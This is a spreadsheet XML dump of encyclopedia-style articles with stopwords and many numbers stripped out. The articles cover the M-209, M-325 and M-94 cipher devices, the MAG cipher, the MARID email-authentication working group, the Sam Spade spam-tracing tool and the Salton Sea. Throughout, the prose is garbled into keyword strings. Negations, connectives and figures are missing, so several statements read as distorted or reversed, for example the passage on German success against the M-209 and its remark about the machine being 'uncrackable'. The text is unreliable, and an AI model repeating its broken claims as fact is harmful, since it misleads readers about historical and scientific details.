bars. each drum affixed movable lugs; lugs aligned wheels, placed "neutral" positions. effective causes guide tilt forward, contacting drum. positioning lugs comprises second part internal keying mechanism. owing complexity setting internal keying mechanism, altered relatively infrequently; changing internal keys common practice. when operator turns power handle, cylindrical drum makes complete revolution bars. bars contacts guide active wheel, slid left; lugs neutral positions, contact guide arm, affect position bar. bars slid left comprise variable-toothed gear, turn shifts letter encoded; shift equal number bars protruding left. resulting ciphertext letter printed onto paper tape. after rotation complete, retractor pushes protruding bars back place. intermediate gears advances wheels position, locking latches drum prevent second encoding indicator disk adjusted next letter. this system allowed offset change enciphered letter; without facility, enciphering scheme would resemble insecure caesar shift cipher. example configuration prior encoding anything using m-209, operator must machine according preset configuration. this configuration includes settings wheels, position rotating drum; typically specified tables secret system publication given sender receiver. rotational alignment wheels could chosen sender random, provided receiver secure channel communication. each letter wheel associated either left right. table specifying setting pins might resemble following: letters present table given wheel corresponding right, "effective", position. absent letters, represented dash, left, "ineffective", position. rotating drum bars, lugs. these lugs position case aligned corresponding wheel, positions, case ineffective. table indicating settings drum might look like this: would lugs positions, lugs positions, position, example, pushed side guide currently active wheel "effective" position. finally, external rotating wheels either specific random sequence letters. testing internal settings m-209, customary operator wheels "aaaaaa", proceed encoding message consisting nothing letter "a." resulting ciphertext compared long check string verify internal settings performed properly. check string particular configuration wheel pins come play reach lower part wheel rotation; contact release guide deflects lugs left. active offset particular amount letter currently displayed front wheel; "aaaaaa" showing wheels, pins play associated letters "ponmlk", left right. example encoding after m-209 configured according settings above, machine ready encode. continuing example known check string, first letter encoded "a". operator sets indicating disk letter "a", turns power handle. since wheels string "aaaaaa", active pins "ponmlk"; according settings above, ineffective first wheel, effective second wheel, effective third, effective fourth, ineffective fifth, effective sixth. guide arms associated effective pins tilt forward contact rotating drum; case, guide arms effective. drum positions slid left, participate variable-toothed gear driving output machine. according given settings, bars slid left, total bars, "teeth" variable-toothed gear. encoding letter shift m-209 uses reciprocal substitution cipher beaufort scheme; alphabet used plaintext message mapped alphabet reverse (atbash): shifting considered, becomes "z", becomes "y", becomes shifting proceeds reverse direction; instance, plaintext maps ciphertext "k"; shifting three positions, left, gives ciphertext "n". shift circular, shift steps left side, continues right. this approach self-inversing, meaning deciphering uses table way: ciphertext entered plaintext; maps ciphertext alphabet, shifting three positions, thus giving original plaintext back. continuing example above, initial letter encoded "a", maps ciphertext. shift given variable-toothed gear shifting left positions gives final ciphertext letter "t", first digit check string. encoding cycle, wheels advanced position. wheels read "bbbbbb", active pins "qponml". guide arms interact drum, resulting different shift next encoding operation, security security m-209 good time, means perfect. lorenz electric teletypewriter cipher machine (codenamed tunny allies), codebreaker hold overlapping sequences, would fingerhold m-209 settings, operation distinctive quirks could exploited. early 1943, german code breaking world able read 10-30% m-209 messages. was, however, considered adequate tactical still used army korean war. researcher dennis ritchie described 1970s collaboration james reeds robert morris ciphertext-only attack m-209 could solve messages least 2000–2500 letters. ritchie relates that, discussions nsa, authors decided publish told principle applicable machines still foreign governments.in 2004, german news site heise online published feature german efforts break m-209. production usage u.s. m-209s produced rate units smith corona typewriter company groton, starting 1942. over 140,000 machines produced.: gradually replaced older m-94 tactical cipher. german sg-41 supposed standard tactical cipher machine, germans limited supplies lightweight metals magnesium aluminum, simply heavy tactical use. menzer also worked cipher machines based hagelin technology, including follow-on enigma, "sg-39", simple fairly strong handheld cipher machine, "schlüsselkasten" ("code box"). neither machines reached production. menzer devices service, would certainly caused trouble allied cryptanalysts, though uncrackable m-209. after war, hagelin came improved model m-209, designated "c-52". c-52 featured period 2,756,205,443; wheels could removed reinserted different order; printwheel mixed alphabet. however, c-52 last generation classic cipher machines, time digital technology permitting development ciphers secure. references further reading reeds, ritchie, morris, "the hagelin cipher machine (m-209): cryptanalysis ciphertext alone", unpublished technical memorandum, bell laboratories, 1978. submitted cryptologia ([1]). barker, wayne (1977). cryptanalysis hagelin cryptograph. aegean park press. isbn 978-0-894-12022-0. oclc 3902917. lasry, george; kopal, nils; wacker, arno (2018). "ciphertext-only cryptanalysis short hagelin m-209 ciphertexts". cryptologia. (6): 485–513. doi:10.1080/01611194.2018.1428836. s2cid 52881736. lasry, george; kopal, nils; wacker, arno (2016). "automated known-plaintext cryptanalysis short hagelin m-209 messages". cryptologia. 49–69. doi:10.1080/01611194.2014.988370. s2cid 20980068. external links dirk rijmenants' m-209 simulator windows 1944 m-209 manual jerry proc's page m-209 nick gessler's page m-209 m-209 simulator written pythonthis article, earlier version incorporates material greg goebel's codes, ciphers, codebreaking.</t>
  </si>
  <si>
    <t>M-325</t>
  </si>
  <si>
    <t>history cryptography, m-325, also known sigfoy, american rotor machine designed william friedman built 1944. between 1944 1946, 1,100 machines deployed within united states foreign service. discontinued 1946 faults operation. friedman applied patent m-325 august 1944; granted march 1959 patent #2,877,565). like enigma, m-325 contains three intermediate rotors reflecting rotor. also hebern rotor machine sigaba references further reading louis kruh, converter m-325(t), cryptologia 1977, pp143–149. external links operating keying instructions converter m-325(t) headquarters, army security agency, july 1948, scanned transcribed lord. friedman m-325 information photographs. u.s. patent 2,877,565</t>
  </si>
  <si>
    <t>M-94</t>
  </si>
  <si>
    <t>m-94 piece cryptographic equipment used united states army, consisting several lettered discs arranged cylinder. also employed navy, name 488. device conceived colonel parker hitt developed major joseph mauborgne 1917; based system invented thomas jefferson etienne bazeries. officially adopted 1922, remained circa 1942, replaced complex secure electromechanical rotor machines, particularly m-209. principle device consisted aluminium discs attached four-and-a-half inch long rod, disc containing letters roman alphabet scrambled order around circumference (with exception 17th disc, began letters "army us"). each wheel different arrangement alphabet, stamped identifying number letter; wheels identified according letter following wheel, 25". wheels could assembled order; ordering used encoding comprised key. there factorial) 15,511,210,043,330,985,984,000,000 (more septillion) possible keys, expressed 84-bit size. messages encrypted letters time. turning discs individually, operator aligned letters message horizontally. then, remaining lines around circumference cylinder sent ciphertext. decrypt, wheels turned line matched letter block ciphertext. plaintext would appear lines, could visually located easily, would likely "read." principle upon m-94/csp-488 based first invented thomas jefferson 1795 "wheel cypher" become well known, independently invented etienne bazeries century later. m-138-a extension general principle, m-138-a strip cipher machine, used army, navy csp-845), coast guard state department world featured hundreds flat cardboard strips. each strip contained scrambled alphabet, repeated twice, could slid back forth frame; selected cipher session. strip cipher could interoperate m-94 suitable strips provided. original design used aluminum base. william friedman describes problem getting manufactured overcome: soon became apparent army navy cryptologists great increase cryptosecurity would obtained alphabets m-94 device could made variant instead invariant. there began efforts services develop practical instrument based upon principle. take time show developments final form adopted army, strip cipher device type, m-138-a. this form used aluminum base channels overhanging edges hold cardboard strips alphabets could slid easily within channels. interest learn given attempts find firm would could make aluminum grooved devices quantity, mrs. friedman, womanly wiles cajolery behalf group u.s. coast guard, succeeded inducing enticing firm make her. first models strip cipher devices made aluminum extrusion process came about, u.s. army, administrative cooperation inter-service level technical cooperation marital level, found practical develop produce quantity strip cipher device, type m-138-a. this used 1935 1941 1942 army, navy, marine corps, coast guard, including treasury state departments. used back-up system even armed services well department state began employing much better sophisticated cipher machines high speed security.": p.148 another problem aluminum short supply early attempts made make strip cipher bases plastic mahogany, limited success. fortunately, aluminum became available fall 1943. cryptanalysis like classical ciphers, strip ciphers easily cracked enough intercepted ciphertext. however, takes time specialized skills, m-94 still good enough early years world intended "tactical cipher"; similar modern dryad batco. m-138-a stronger slips alphabets could issued periodically, even radio using secure systems like sigaba. both replaced m-209 mechanical rotor machine became available. also jefferson disk references external links description csp-488 a.k.a. m-94 jerry proc's page m-94 pictures m-94 instructions cylindrical cipher device, u.s. navy, 1926</t>
  </si>
  <si>
    <t>MAG (cipher)</t>
  </si>
  <si>
    <t>cryptography, stream cipher algorithm developed rade vuckovac. submitted estream project ecrypt network. selected focus, consideration phase 'archived'.</t>
  </si>
  <si>
    <t>MARID</t>
  </si>
  <si>
    <t>marid ietf working group applications area tasked propose standards email authentication 2004. name acronym authorization records dns. background lightweight authentication protocol (lmap) generic name 'designated sender' proposals discussed asrg fall 2003, including: designated mailers protocol (dmp) designated relays inquiry protocol (drip) flexible sender validation (fsv) mtamark reverse (rmx) sender policy framework (spf)these schemes attempt list valid addresses send mail domain. "lightweight" lmap essentially stands crypto", opposed domainkeys successor, dkim. march 2004, internet engineering task force ietf held proposals. result meeting, task force chartered marid working group.microsoft's caller-id proposal late highly controversial addition mix. came following features: policies reduced known sender piggybacking extension existing 2822 mail header fields domainkeys (all lmap drafts used smtp envelope.) specific questions patents licensing proceedings working group decided postpone question 2821 smtp identities i.e. mail from covered spf, helo covered favour 2822 identities covered caller-id's later sender-id's purported responsible address (pra). arrived point sender policies could split different scopes, like 2821 mail from 2822 pra. marid spf2.0 syntax also allowed join different scopes policy record, sets permitted identical, often case. less week publication first mfrom mail from draft, terminated unilaterally leadership. marid existed seven months, rfcs published.the responsible ietf area director agreed sponsor publication unfinished marid discussions ietf experiments; happened 2005, pre-marid sender approved experimental rfcs. latter certain degree result marid, growing caller-id proposal. ongoing disputes technical issues incompatibilities sender resulted later appeals iesg iab. references external links historical asrg lmap draft (2004) marid status page (2004) mxcomp list archive iesg applications area directorate (dissolved) iesg evaluation sender-id (2005) appeal links sources (2006) senderid appeal history (2006) "selected marid-related terms acronyms". techmoids.org. archived original 2008-09-07. retrieved 2008-06-14.</t>
  </si>
  <si>
    <t>Sam Spade (software)</t>
  </si>
  <si>
    <t>spade name windows software tool designed assist tracking sources e-mail spam. also name free service provides access similar online tools. spade utility authored steve atkins 1997. named fictional character spade. query tools main features (query tools) were: zone transfer server knows domain smtp relay check check whether mail server allows third party relaying scan addresses scan range addresses looking open ports crawl website search website, looking email addresses, offsite links, etc. browse browse http format check cancels search news server cancel messages fast slow traceroute find route packets take remote system s-lang command issue scripting command; useful debugging scripts decode decipher obfuscated parse email headers read email headers make guess origin email website history last fully functional version website available 2004-02-26. since experienced various outage problems "blackholing samspade.org several rirs general heavy usage." longer online. currently redirects https://tools.wordtothewise.com/ contains similar tools brand name "wisetools" hosted atkins's email software business word wise references external links spade home page (currently offline) spade download sites windows client download page (currently offline, last archived here) archived windows client software download spade majorgeeks.com using spade spade tutorial terry pasley, 2003, maintained sans institute infosec reading room</t>
  </si>
  <si>
    <t>Salton Sea</t>
  </si>
  <si>
    <t>salton shallow, landlocked, highly saline body water riverside imperial counties southern u.s. state california. lies andreas fault within salton trough stretches gulf california mexico. over millions years, colorado river flowed imperial valley deposited alluvium (soil), creating fertile farmland, building terrain, constantly moving main course river delta. thousands years, river alternately flowed valley, diverted around creating either saline lake called lake cahuilla, desert basin, respectively. when colorado river flows valley, lake level depends river flows balance inflow evaporative loss. when river diverts around valley, lake dries completely, around 1580. hundreds archaeological sites found region, indicating possibly long-term native american villages temporary camps. current lake formed inflow water colorado river 1905. beginning 1900, irrigation canal colorado river alamo river channel provide water imperial valley farming. headgates canals sustained buildup silt, series cuts made bank colorado river increase water flow. water spring floods broke canal head-gate diverting portion river flow salton basin years repairs completed. water formerly lake created modern lake, miles km). lake would dried farmers used generous amounts colorado river water excess flow lake. 1950s '60s, area became resort destination, communities grew hotels vacation homes. birdwatching also popular wetlands major resting stop pacific flyway. 1970s, scientists issued warnings lake would continue shrink become inhospitable wildlife. 1980s, contamination farm runoff promoted outbreak spread diseases. massive die-offs avian populations occurred, especially loss several species fish depend. salinity rose high large fish kills occurred, often blighting beaches carcasses. tourism drastically reduced. after 1999, lake began shrink local agriculture used water efficiently less runoff flowed lake. lake became exposed, winds sent clouds toxic dust nearby communities. smaller amounts dust reached angeles area people could sometimes smell odor coming lake. state mainly responsible fixing problems, california lawmakers pledged fund air-quality management projects conjunction signing 2003 agreement send water coastal cities. local, state, federal bodies found minimal success dealing dust, dying wildlife, problems warnings issued decades before. beginning 2018 local agencies declared emergency and, along state, funded developed salton management program. 2020, palm springs life magazine summarized ecological situation "salton derives fame biggest environmental disaster california history".after slow start small projects, construction started $206.5 million project early 2021 delta river, creating ponds wetlands southern shore lake. history before modern gulf california would extend north indio, delta created colorado river. over three million years, pleistocene, river's delta expanded northern part gulf. since then, colorado river alternated emptying basin, creating freshwater lake, emptying gulf, leaving lake turn desert. wave-cut shorelines various elevations record repeated cycle filling drying hundreds thousands years. recent freshwater lake lake cahuilla, also known blake american professor geologist william phipps blake. covered 2,000 square miles (5,200 km2), times area salton sea.archaeological sites radiocarbon dates indicate lake filled three four times last 1300 years. when full, lake would attract native americans shores. hundreds sites found, possibly long-term villages temporary camps. occupants least four species fish (two razorback sucker bonytail chub), birds (particularly coot), black-tailed jackrabbit, black-tailed cottontail rabbit, sometimes deer bighorn sheep. among plants used bulrush, cattail, mesquite, saltbush. cahuilla people oral memory last lake, existed 17th century dried soon 1700.throughout spanish period california's history, area referred "colorado desert" colorado river. railroad survey completed 1855, called "the valley ancient lake". several maps library congress, found labeled "cahuilla valley" (after local native american tribe) "cabazon valley" (after local native american chief chief cabazon). "salt creek" first appeared 1867 "salton station" railroad 1900, although place rail stop since late 1870s. until advent modern sea, salton sink site major salt-mining operation. modern formation 1900, governor james budd, california development company began construction irrigation canals divert water colorado river salton sink, lake bed. after construction irrigation canals, salton sink became fertile time, allowing farmers plant crops.within years, alamo canal became filled silt colorado river. engineers tried alleviate blockages avail. 1905, heavy rainfall snowmelt caused colorado river swell, overrunning third intake bank river sending flood alamo canal. resulting flood poured canal, former arroyos, river west, alamo river east, long. over years, newly created rivers carried entire volume colorado river salton sink.the southern pacific railroad tried stop flooding dumping earth canal's headgates area, effort fast enough, river eroded deeper deeper desert sand imperial valley. large waterfall formed result began cutting rapidly upstream along path alamo canal occupied colorado. this waterfall initially feet (4.6 high, grew feet high flow breach stopped. originally, waterfall feared recede upstream true main path colorado, becoming feet high, would practically impossible stop flow. basin filled, town salton, southern pacific railroad siding, torres-martinez native american land submerged. tribe's reservation straddles northern lake. sudden influx water lack drainage basin resulted formation salton sea. agriculture, tourism wildlife proliferate 1920s, agriculture boomed valley imperial irrigation district delivered large quantities colorado river water irrigate crops. lake would dried naturally, flood irrigation commonly used, plenty water farms lake kept full. district holds senior rights water colorado river according doctrine prior appropriation, based whoever first water beneficial could continue claim 1930, wildlife refuge established wetlands along edge lake attracted many birds. fish flourished lake provided source food massive populations migratory birds. birdwatchers flocked refuge middle desert.the continuing intermittent flooding imperial valley colorado river ended construction hoover dam. imperial dam, built 1938, serves desilting water entering irrigation canals.in 1950s 1960s, communities expanded area's reputation resort destination sport fishery grew. hotels yacht clubs built shore along homes schools. resorts communities like bombay beach hosted entertainers frank sinatra, beach boys bing crosby. yacht clubs held parties night golf courses provided recreation. many people came boating activities water skiing fishing stocked fish proliferated. lakeshore communities grew vacation homes built. more million visitors visited annually peak. catastrophic decline 1970s, scientists issued warnings changes coming lake outlet. studies started 1960s found complex problem remediation would expensive. imperial valley five hundred thousand acres (200,000 farmland flood irrigation typical. water colorado river diverted near yuma, arizona, 82-mile (132 all-american canal. canal runs west along mexican border north 1,700 miles (2,700 irrigation channels crisscross farms.gravity carries agricultural runoff downhill alamo rivers lake. water full salts, selenium, fertilizers (mainly nitrates). drains soil, water leaches ancient salt deposits also raise salinity. evaporation desert heat concentrates salt. transformation lake made increasingly inhospitable wildlife. before decade, fish started dying bird populations declined.in late 1970s series heavy tropical storms caused water level rapidly rise flood banks. surrounding towns businesses severely damaged, many beyond repair. 1976, hurricane kathleen inundated lakeshore communities bombay beach completely underwater. tourism drastically reduced, many resorts associated infrastructure abandoned. state began issue odor advisories lake began stink.in 1990s, shores littered dead fish lake gotten salty large die-offs occurred. fertilizers runoff caused massive blooms algae. when storms churned lake, botulism spread among dying tilapia, eaten birds. during four-month long period 1996, 14,000 birds died eating fish, nearly 10,000 pelicans. carcasses burned incinerator hours weeks. resulting news coverage conveyed simplified story implied lake toxic catastrophe filled water could deadly. congressman 1995, former mayor nearby palm springs, sonny bono, advocated attention problems. wife politicians took cause form tribute bono death 1998 skiing accident. congress passed president bill clinton signed salton reclamation 1998 (public 105-372). 1999, lake began recede dramatically. dropping water level stranded many remaining boat docks, residences, businesses. water-management priorities changing including diverting water agricultural areas cities. u.s. department interior prepared draft environmental impact report compliance reclamation working partnership salton authority. strategic science plan bureau reclamation's alternatives appraisal report also added voluminous studies lake. before legislative scientific recommendations implemented, priorities shifted away activities lake september attacks 2001.in 2003, imperial irrigation district signed largest agriculture-to-urban water transfer agreement history. much water allocation would communities along california coast profit. with 45-year term, quantification settlement agreement means diego county water authority districts obtain additional water growing communities serve. local agriculture became efficient using water resulted shoreline retreating less run-off flowed lake. farmers installed sprinklers replace flood irrigation used soil measurement devices tell water. salton shrank, became saltier ocean water. california state legislature, legislation enacted 2003 2004, directed secretary california resources agency prepare restoration plan salton ecosystem, environmental impact report. salton authority consultant study alternatives 2004 issued preferred alternative. after receiving comments agencies, approved report 2006. they hoped reports would influence state prepared proposal mandated legislature.the state released $8.9-billion proposal 2007 involved building horseshoe-shaped outer lake, berm crossing center lake extensive system dikes, channels pumps. concerns impact lake, district approved water transfer agreement governor gray davis signed 2003 legislation known salton restoration act. stated "intent legislature state california undertake restoration salton ecosystem permanent protection wildlife dependent ecosystem". restoration plan implemented state lawmakers found expensive great recession economy. repeated delays dwindling public interest precluded real change. exposed lakebed impacts quality lake continued exposing lake known playa, sending nearby communities clouds toxic dust. haze incorporating pesticide plumes, exhaust fumes, factory emissions, vaporized dust lake regularly hangs communities valley. with dense blend ozone particulate matter, imperial county became known worst quality country. eastern coachella communities disproportionately higher rates asthma respiratory complications high concentrations contaminants air. scientists studying much salton dust actually windblown particles. schools imperial valley green, yellow, flags signaling quality many children asthma. green means join friends playground, whereas means stay inside day. parents also receive emailed alerts imperial county pollution control district. local activists issue environmental justice, since area impacted latinos. some 650,000 people, many farmworkers, live significant exposure dust.: public health impacts continuing meet federal quality standards include treatment child adult asthma, cardiac disease, lung cancer, increased mortality rates.: lower concentrations wind-borne dust travels southern california arizona. residents angeles basin, miles (240 away, complained odor drifted 2012, biomass bottom churned storm.during first years sale imperial water diego county, imperial irrigation district required water salton compensate loss agricultural runoff needed replenish sea. 2017 deadline ending additional mitigation water approached, district, along imperial county, petitioned california state water resources control board 2014 demand state action fulfill obligation years delays unfulfilled plans. pacific institute, environmental think tank, warning lack replenishment water leading "period rapid deterioration." rapidly shrinking "looming environmental public health crisis". with increased shrinkage, dust storms would increase rotten-egg smell would reach coastal cities frequently.about 36,000 acres (15,000 ha), 10%, imperial valley's arable farmland temporarily fallowed meet reductions water transfer agreement. farms imperial valley produce alfalfa, wheat, vegetables carrots brussels sprouts. 2015, widely planted crop alfalfa, followed bermuda grass sudan grass. third produced exported china, united arab emirates, saudi arabia, japan. most exported feeds dairy cows, japan uses kobe beef.on january 2018, less water began flowing 15-year mitigation period ended 2003 water transfer agreement. court decision also forced imperial irrigation district program allowed equally distribute amount water members receive. although shrinking years, began lower water level significantly. shore recedes, least square miles (190 km2) playa exposed 2045, additional dust becoming wind blown exposed playa dries out. vertical drop foot water level expose thousands feet horizontal playa. state mainly responsible, california lawmakers pledged fund air-quality management projects mitigate impacts 2003 water transfer agreement.: over years, local, state federal bodies found minimal success dealing dust exposed playa. reduce wind-borne dust, district program known vegetation enhancement surface roughening, includes plowing furrows newly exposed playa within property owned district.fugitive dust, consisting small particles suspended air, studied distinguish playa dust desert emissions primarily made mineral dust soil. imperial county quality management district, south coast quality management district, university california riverside school medicine along environmental justice group comite civico valle using mobile stationary quality monitoring units effort protect health nearby residents. salton management program salton task force formed state 2015 governor jerry brown's administration. natural resources agency released salton management program (ssmp) march 2017. ssmp proposes constructing 29,800 acres (12,100 habitat restoration dust suppression projects lakebed areas been, exposed salton year 2028. this improve conditions residents wildlife. initial 10-year plan cover less half lakebed researchers exposed time. state initially budgeted $80.5 million begin designing wetlands without commitment program ever fully funded. projected cost design construct improvements $383 million. focus longer restoring lake presenting feasible plan budget legislators would gradually fund ten-year period. 10-year plan everything state local officials continue seek ways deal problems. salton management program monitoring adaptive management implementation plan developed prioritize phase-in implementation 2013 usgs salton ecosystem monitoring assessment plan.the first state-funded project torres-martinez wetland project. torres martinez desert cahuilla indians partnered state restore shallow wetlands along northern edge destroyed massive storm 2012. this prototype project completed april 2018.in november 2019, emergency declared "heavily polluted river, empties salton sea". imperial county board supervisors hoping would accelerate restoration projects enabling state obtain federal funding. nearly state's funding comes bond measures salton projects. since 2000, california voters approved five bond measures 2020.in february 2020, california natural resources agency finished "bruchard road dust suppression project" which, although acres ha), first dust suppression project completed salton management program: phase year plan (august 2018). construction began ambitious 4,110-acre (1,660 species conservation habitat project january 2021 small delta river. $206.5 million project building ponds wetlands sides mouth highly polluted river southern bank sea. alternative proposals many concepts proposed deal problems. idea importing seawater pacific ocean cortez mexico around long time. area's plentiful geothermal power could used desalinate water. around 2004, aqua genesis proposed project would sell nonsaline water. their proposal involved construction miles pipes tunneling would provided 1,000,000 acre-feet (1.2 km3) water southern california coastal cities year.in 2018, california's natural resources agency requested proposals increase waterflow reduce dust dust-borne toxins. proposals ranged cost $300 million several billion dollars.berkshire hathaway energy subsidiary already operates geothermal plants area, 2020 developing seawater desalination proposal. july 2020 news item (written lobby group) discussed method improve prevent wind spreading toxic dust": refilling water imported cortés; would require building aqueduct. june research report, however, stated cost "transferring water agricultural users salton sea" would lower achievable using existing infrastructure). aqueduct proposal, others, hang outcome feasibility study expected late 2021. ecology salinity salton salinity grams salt liter water, greater pacific ocean g/l). lack outflow means salton natural stabilization system; dynamic. fluctuations water level caused variations agricultural runoff, ancient salt deposits lake bed, relatively high salinity inflow feeding causing increasing salinity. concentration increasing rate year. about million tonnes salt deposited valley year. undated report university california: imperial county website provided specifics: "salton salinity 44,000 mg/l, 4.4% salt. amount salts deposited imperial valley agricultural land irrigation water million tons salts annually. maintain crop productivities, equal amount salts must leached root zone".fertilizer runoffs resulted eutrophication, large algal blooms elevated bacterial levels. 1970s, runoff full salty chemicals warning salinity lake would longer sustain wildlife. january 2020, salinity salton double atlantic ocean. both hypersalinity presence contaminants salton triggered massive die-offs fish avian populations; salt water carries less oxygen fresh water, depleted algal blooms extreme temperatures summer period. fish population desert pupfish native fish species sea, federally listed endangered species united states. this freshwater fish, notable ability withstand rising salinity salton sea, survive salinities ranging freshwater twice salty seawater.the body initially freshwater lake stocked tilapia, gulf croaker, orangemouth corvina, sargo, sustained important sport fishery provided food birds. 1960s, rising salinity begun jeopardize species. september 2019 report stated years earlier, "there million fish sea. now, fish gone". saline species fish. massive fish kills involve oxygen-depleting combination summer salt. fish suffocate salt water carries less oxygen fresh water. dead fish wash mass quantities beaches.introduced tilapia (hybrid mozambique wami) tolerate high salinity levels pollution. 2014, fresh brackish water fish species lived rivers canals salton sea, including redbelly tilapia, threadfin shad, carp, shiner, channel catfish, white catfish, largemouth bass, mosquitofish, sailfin molly.the california office environmental health hazard assessment developed safe eating advisory fish caught salton based levels mercury pcbs found local species. 2009, species considered acceptable populations. avian population salton termed "crown jewel avian biodiversity" milt friend salton science office. hosts "the diverse probably significant populations bird life continental united states, rivaled bend, texas;" species documented. salton also major resting stop pacific flyway. december 2018 report national geographic society stated: "nearly california's population eared grebes, example, stop lake, least third white pelicans living north america ..." report expressed concern reducing input water increasing salinity. "without extra water, lake's shrinking start accelerate—making saltier, smaller, less welcoming birds rely migration".both hypersalinity presence contaminants salton triggered massive die-offs fish avian populations contamination promoted outbreak spread diseases avian cholera. turn, loss several species fish avian population depended food increased risk starvation, exacerbating decline. birdwatchers 2017 reported american white pelicans, double-crested cormorants, eared grebes disappeared. vegetation according kuchler u.s. potential natural vegetation types, area roughly within miles (4.8 sandy shoreline salton would saltbush/greasewood (40) vegetation type great basin shrubland vegetation form. geography this saline, endorheic rift lake andreas fault southern u.s. state california lies between, within, imperial coachella valleys, within larger salton trough, pull-apart basin stretches gulf california mexico. lake occupies lowest elevations trough, known salton sink, lake surface 236.0 (71.9 level january 2018. deepest point lake (1.5 higher lowest point death valley. salton miles km), though varies dimensions area fluctuations agricultural runoff rainfall. new, whitewater, alamo rivers, combined agricultural runoff, primary sources feed lake. with estimated surface area square miles (890 km2) square miles (910 km2), salton largest lake california surface area. average annual inflow less million acre⋅ft (1.5 km3), enough maintain maximum depth feet total volume million acre⋅ft (7.4 km3). however, changes water apportionments agreed upon colorado river quantification settlement agreement 2003, surface area expected decrease 2013 2021. ownership land lake patchwork ownership spread across three primary entities: federal government mostly bureau reclamation bureau land management, imperial irrigation district (iid), torres martinez desert cahuilla indians. climate according köppen climate classification system, salton desert climate (bwh). according united states department agriculture, plant hardiness zone average annual extreme minimum temperature 28.5 (−1.9 °c). temperature surface water changes seasonally varying temperature. winter surface water reach temperatures summer surface water highs reach °c). geology earthquakes tectonic setting salton surrounding basin sits andreas fault, jacinto fault, imperial fault zone, "stepover fault" shear zone system. geologists determined previous flooding episodes colorado river linked earthquakes along andreas fault. sonar instruments used salton sea's underwater faults study. during period basin filled lake cahuilla, much larger inland sea, earthquakes higher magnitude occurred roughly every years, last occurring within decades 1700. computer models suggest normal faults area vulnerable deviatoric stress loading filling water. currently, risk still exists earthquake magnitude simulations also showed, angeles area, shaking thus damage would severe andreas earthquake propagated along fault south, rather north. such earthquake also raises risk soil liquefaction imperial valley region.the effective drainage divide separates salton gulf california feet elevation located near delta, northeastern baja california state, mexico, south-southeast mexicali. past level rise partially responsible salinity lake, potential future changes levels could occur. however, factors hydrothermal vents, diffusion salt minerals sediment, including concentrated brine, evaporites another contributor salinity, recent lowering lake levels raising salinity, though sedimentary records show lake surface elevation reached levels feet world level 1500s. volcanism evidence geothermal activity visible. salton buttes volcanoes geothermal field name. mudpots volcanoes found eastern side salton sea, including mobile niland geyser. area used geothermal electricity generation, plants located along southeastern shore salton imperial county. lithium production geothermal activity salton loosens lithium mined. increased demand lithium, crucial electric-vehicle battery production, salton area attracting attention, extraction lithium expected boost local economy.in july 2021, general motors announced partnering controlled thermal resources develop combined lithium extraction power generation facility hell's kitchen geothermal field salton sea, employing closed-loop process. brine extracted ground, geothermal steam used drive turbine generating electricity, reacting brine separate lithium hydroxide lithium carbonate used battery production.the california energy commission estimates might produce 600k metric tons lithium carbonate year. communities u.s. navy conducted preliminary inspection salton january 1940, salton test base (sstb, sandia labs) initially commissioned naval auxiliary station salton sea, october 1942. sstb, southeast salton city, originally functioned operational training base seaplanes. additional activities base included experimental testing solid-fuel plane-launched rockets, jet-assist take-off testing, aeroballistic testing inert atomic weapon test units land marine target areas, training bombing marine targets, testing effects long-term storage atomic weapons, testing project mercury space capsule parachute landing systems, parachute training testing, military training exercises. base abandoned 1978.the salton success resort area, salton city, salton beach, desert shores, western shore desert beach, north shore, bombay beach, built eastern shore 1950s. increasing salinity pollution lake years agricultural runoff sources, communities substantially shrank size, abandoned. smell lake, combined stench decaying fish, also contributed decline tourist industry around salton sea. geological survey describes smell "objectionable", "noxious", "unique", "pervasive". 2020 article provided comment settlements around salton sea: since 2011, bombay beach surrounds reinvented destination desert art. it's alone distinction south city towns niland slab city, areas attracted artists creations like east jesus salvation mountain. some people visiting salton surrounding settlements explore abandoned structures squatter settlement slab city. town niland miles (2.4 southeast sea, population 1,006. late june 2020, fire niland caused great deal damage niland, displacing people; time, estimated population diminished 500.the population bombay beach declined years buildings rotting away, people moved settlement. news item april 2018 stated "enjoying rebirth sorts influx artists, intellectuals hipsters turned bohemian playground". population estimate 2020 persons, certainly higher official census number 2010. recreation salton state recreation area offers hunting, fishing, swimming, camping visitors northeastern side sea. powerboat racing "low barometric pressure greater water density make salton fastest body water world speedboat racing," according article january–february 1950 issue national motorist magazine. (this statement, however, erroneously conflates barometric pressure altitude, fact opposite true, extremely altitude region provides higher barometric pressure, beneficial internal combustion engines) "the altitude thought ideal carburetion talk 'fastest body water world.'" beginning late 1920s, properties made salton attractive venue races.although natural advantages first attacked unfair courses, 1930s salton racing organization backed national power boat association attracting best boats drivers races held desert beach annually 1941 1951 subsequently beaches, ultimately west side sea.from 1961 1965, hosted salton city 500, marathon endurance race attracted drivers notable mickey thompson astronaut gordon cooper.after lengthy hiatus, 2008 racing returned world records sprint boat salton speed week. winner bathtub race 1970 crossed miles east shore back hour four minutes. popular culture films salton (2002), tony gayton, directed d.j. caruso starring kilmer, vincent d'onofrio peter sarsgaard. plagues pleasures salton (2006), filmmakers chris metzler jeff springer narrated john waters. melding high camp stark realism film covers first years history salton featuring rare archival photos footage, plus interviews residents call salton home. visit salton inspired filmmaker curtis harrington make dreamlike short film edge (1949), extensively uses bubbling mudpots edge sea. 1971 interview, harrington stated, "the location used entirely covered water now; risen cover it." film, monster that challenged world (1957), deals gigantic prehistoric mollusks reawakened residing, suspended animation, bottom salton sea. bombay beach 2011 documentary film directed produced israeli filmmaker alma har'el. using failed 1950s development boom bombay beach, film dreamlike poem three personal stories. short documentary, useless (2016), film focusing environmental challenges beauty surrounding salton sea. miracle desert: rise fall salton (2020) documentary tells full origin creation sea, well real estate boom bust 1950 1970 examining exodus people current environmental crisis faces. television history channel's 2006 episode "engineering disasters (#13-04), television documentary series modern marvels, describes combined manmade natural events leading creation salton early 20th century, brief popularity resort destination midcentury, subsequent decline high salinity farm runoff. impacts salton fish bird populations addressed future plans rescue described. national geographic explorer present june 2018, record encounter supporters flat earth members independent investigations group. experiment successfully demonstrated curvature earth disappearance distance boat-based shore-based targets. music video michael jackson's closet" (1992) filmed salton sea. clips jackson dancing video used video song place name" (2014). video kesha's "praying" (2017) partly filmed salton sea. mitski's song "drunk walk home" (2014) opens couplet retire salton 23." this reference end-of-the-road perception salton sea. hostility life poses fish metaphor giving life young depression. sheverb recorded album "once upon time bombay beach" nearly abandoned town bombay beach early 2020. album cover weyes blood's "front seat earth" (2016) photographed beside salton sea. served inspiration beginning album process. mering described completely desolate wasteland, full mass extinction, brought humankind." salton appears music videos album's singles, "generation why" "used be". games video-game grand theft auto (2013), large lake called 